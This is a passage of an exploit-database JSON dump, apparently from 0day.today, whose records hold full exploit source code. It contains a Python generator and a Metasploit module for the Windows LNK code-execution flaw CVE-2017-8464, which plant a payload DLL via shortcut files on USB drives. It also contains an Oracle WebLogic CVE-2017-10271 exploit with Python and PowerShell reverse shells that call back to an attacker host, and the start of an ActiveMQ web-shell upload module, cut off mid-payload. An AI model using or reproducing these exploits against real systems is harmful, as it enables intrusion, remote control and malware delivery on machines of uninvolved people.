-----------------------------------------------------------------\r\n # | HotKey | Reserved1 |\r\n # -----------------------------------------------------------------\r\n # | Reserved2 |\r\n # -----------------------------------------------------------------\r\n # | Reserved3 |\r\n # -----------------------------------------------------------------\r\n \r\n shell_link_header = [\r\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\r\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\r\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\r\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\r\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\r\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\r\n ]\r\n \r\n return b\"\".join(shell_link_header)\r\n \r\n \r\ndef generate_LINKTARGET_IDLIST(path, name):\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | IDListSize | IDList(variable) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n \r\n # IDList = ItemID + ItemID + ... + TerminalID\r\n # ItemID = ItemIDSize + Data\r\n \r\n def generate_ItemID(Data):\r\n itemid = [\r\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\r\n Data\r\n ]\r\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\r\n \r\n # return ItemIDSize + Data\r\n \r\n return b\"\".join(itemid)\r\n \r\n def generate_cpl_applet(path, name=name):\r\n name += b'\\x00'\r\n path += b'\\x00'\r\n \r\n bindata = [\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\r\n struct.pack('H', len(path)),\r\n struct.pack('H', len(name)),\r\n path.encode('utf-16')[2:],\r\n name.encode('utf-16')[2:],\r\n b\"\\x00\\x00\" # comment\r\n ]\r\n \r\n return b\"\".join(bindata)\r\n \r\n idlist = [\r\n # ItemIDList\r\n \r\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(generate_cpl_applet(path)),\r\n \r\n b'\\x00\\x00', # TerminalID\r\n ]\r\n \r\n idlist = b\"\".join(idlist)\r\n idlistsize = struct.pack('H', len(idlist))\r\n \r\n linktarget_idlist = [\r\n idlistsize,\r\n idlist,\r\n ]\r\n \r\n return b\"\".join(linktarget_idlist)\r\n \r\n \r\ndef generate_EXTRA_DATA():\r\n # ExtraData refers to a set of structures that convey additional information about a link target. These\r\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\r\n # Binary File Format.\r\n \r\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\r\n \r\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\r\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\r\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\r\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\r\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\r\n \r\n # SpecialFolderDataBlock\r\n \r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | BlockSize |\r\n # -----------------------------------------------------------------\r\n # | BlockSignatire |\r\n # -----------------------------------------------------------------\r\n # | SpecialFolderID |\r\n # -----------------------------------------------------------------\r\n # | Offset |\r\n # -----------------------------------------------------------------\r\n \r\n extra_data = [\r\n b'\\x10\\x00\\x00\\x00',\r\n b'\\x05\\x00\\x00\\xA0',\r\n b'\\x03\\x00\\x00\\x00',\r\n b'\\x28\\x00\\x00\\x00',\r\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\r\n ]\r\n \r\n return b\"\".join(extra_data)\r\n \r\n \r\ndef ms_shllink(path, name=b\"Microsoft\"):\r\n '''build Shell Link (.LNK) Binary File Format'''\r\n \r\n lnk_format = [\r\n \r\n # Structures\r\n \r\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\r\n # [STRING_DATA] *EXTRA_DATA\r\n \r\n \r\n # SHELL_LINK_HEADER:\r\n # A ShelllinkHeader structure which contains identification information, timestamps, and\r\n # flags that specify the presence of optional structures.\r\n \r\n generate_SHELL_LINK_HEADER(),\r\n \r\n # LINKTARGET_IDLIST:\r\n # An optional LinkTargetIDList structure, which specifies the target of the link. The\r\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\r\n #\r\n #\r\n \r\n generate_LINKTARGET_IDLIST(path, name),\r\n \r\n # LINKINFO:\r\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\r\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\r\n \r\n # STRING_DATA:\r\n # Zero or more optional StringData structures, which are used to convey user interface and path\r\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\r\n \r\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\r\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\r\n \r\n # EXTRA_DATA:\r\n # Zero or more ExtraData structures\r\n \r\n generate_EXTRA_DATA()\r\n ]\r\n \r\n return b\"\".join(lnk_format)\r\n \r\n \r\nif __name__ == '__main__':\r\n import sys\r\n \r\n if len(sys.argv) != 3:\r\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\r\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\r\n sys.exit(0)\r\n \r\n lnkpath = sys.argv[1]\r\n dllpath = sys.argv[2]\r\n \r\n bindata = ms_shllink(path=dllpath)\r\n \r\n with open(lnkpath, 'wb') as lnkf:\r\n lnkf.write(bindata)\r\n \r\n \r\n## References\r\n \r\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\r\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\r\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\r\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\r\n# 6. https://twitter.com/mkolsek/status/877499744704237568\r\n# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\r\n# 8. https://github.com/rapid7/metasploit-framework/pull/8767\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28245", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:08:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-26T00:00:00", "id": "1337DAY-ID-28197", "href": "https://0day.today/exploit/description/28197", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::EXE\r\n \r\n attr_accessor :exploit_dll_name\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'LNK Remote Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n \r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except in an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass\r\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability discovery\r\n 'Yorick Koster' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://paper.seebug.org/357/'], # writeup\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is 64-bit\r\n 'DisclosureDate' => 'Jun 13 2017'))\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\r\n ])\r\n end\r\n \r\n def exploit\r\n dll = generate_payload_dll\r\n dll_name = \"#{rand_text_alpha(16)}.dll\"\r\n dll_path = store_file(dll, dll_name)\r\n print_status(\"#{dll_path} created copy it to the root folder of the target USB drive\")\r\n \r\n # HACK the vulnerability doesn't appear to work with UNC paths\r\n # Create LNK files to different drives instead\r\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\r\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\r\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\r\n print_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\")\r\n end\r\n end\r\n \r\n def generate_link(path)\r\n path << \"\\x00\"\r\n display_name = \"Flash Player\\x00\" # LNK Display Name\r\n comment = \"\\x00\"\r\n \r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n \r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n \r\n # IDList\r\n idlist_data = ''\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # This PC\r\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n \r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n \r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\n \r\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\r\n def store_file(data, filename)\r\n ltype = \"exploit.fileformat.#{self.shortname}\"\r\n \r\n if ! ::File.directory?(Msf::Config.local_directory)\r\n FileUtils.mkdir_p(Msf::Config.local_directory)\r\n end\r\n \r\n if filename and not filename.empty?\r\n if filename =~ /(.*)\\.(.*)/\r\n ext = $2\r\n fname = $1\r\n else\r\n fname = filename\r\n end\r\n else\r\n fname = \"local_#{Time.now.utc.to_i}\"\r\n end\r\n \r\n fname = ::File.split(fname).last\r\n \r\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\r\n fname << \".#{ext}\"\r\n \r\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\r\n full_path = ::File.expand_path(path)\r\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\r\n \r\n full_path.dup\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28197", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-11T01:13:03", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "zdt", "title": "Apache ActiveMQ < 5.14.0 - Web Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2017-06-30T00:00:00", "id": "1337DAY-ID-28066", "href": "https://0day.today/exploit/description/28066", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ActiveMQ web shell upload',\r\n 'Description' => %q(\r\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\r\n allows remote attackers to upload and execute arbitrary files via an\r\n HTTP PUT followed by an HTTP MOVE request.\r\n ),\r\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-3088' ],\r\n [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => %w{ java linux win },\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => \"Jun 01 2016\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\r\n OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\r\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\r\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\r\n Opt::RPORT(8161)\r\n ])\r\n register_advanced_options(\r\n [\r\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\r\n ])\r\n end\r\n\r\n def jsp_text(payload_name)\r\n %{\r\n <%@ page import=\"java.io.*\"\r\n %><%@ page import=\"java.net.*\"\r\n %><%\r\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\r\n Class c = cl.loadClass(\"metasploit.Payload\");\r\n 